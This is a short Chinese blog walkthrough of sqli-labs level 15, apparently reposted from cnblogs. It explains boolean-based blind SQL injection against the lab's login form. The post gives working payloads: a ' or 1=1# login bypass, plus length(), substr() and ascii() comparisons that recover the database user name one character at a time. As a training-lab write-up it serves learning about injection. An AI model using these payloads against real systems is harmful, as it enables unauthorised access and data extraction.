sql-labs第十五题 - 走看看

zoukankan html css js c++ java

sql-labs第十五题
1 寻找SQL注入

根据题目这是一个基于布尔类型的盲注

1.1 构造永真条件

提交 ' or 1=1# 登录成功

2 利用SQL注入

eg：推断数据库用户名
1. 推断用户名长度
  payload：' or length(user())=14#
2. 逐字符推断用户名
  第一个字符 payload：' or substr(user(),1,1)='r'#
第二个字符 payload：' or substr(user(),2,1)='o'#
......
...
直到推断出全部14个字符

PS：可将字符转换为ASCII码，然后通过值的大小来判断，可加快推断速度。

eg：' or ascii(substr(user(),2,1))>110#
查看全文

相关阅读:
操作缓冲池
 占位图像
 GCD 常用代码
 资源共享(抢夺)
drf版本控制 django缓存
 drf分页器
 解析器,路由控制,响应器
 drf 频率组件 META字典详情
 vue创建路由,axios前后台交互,element-ui配置使用,django contentType组件
 redis列表,字典,管道,vue安装,创建项目

原文地址：https://www.cnblogs.com/a-qi/p/13532626.html

Copyright © 2011-2022 走看看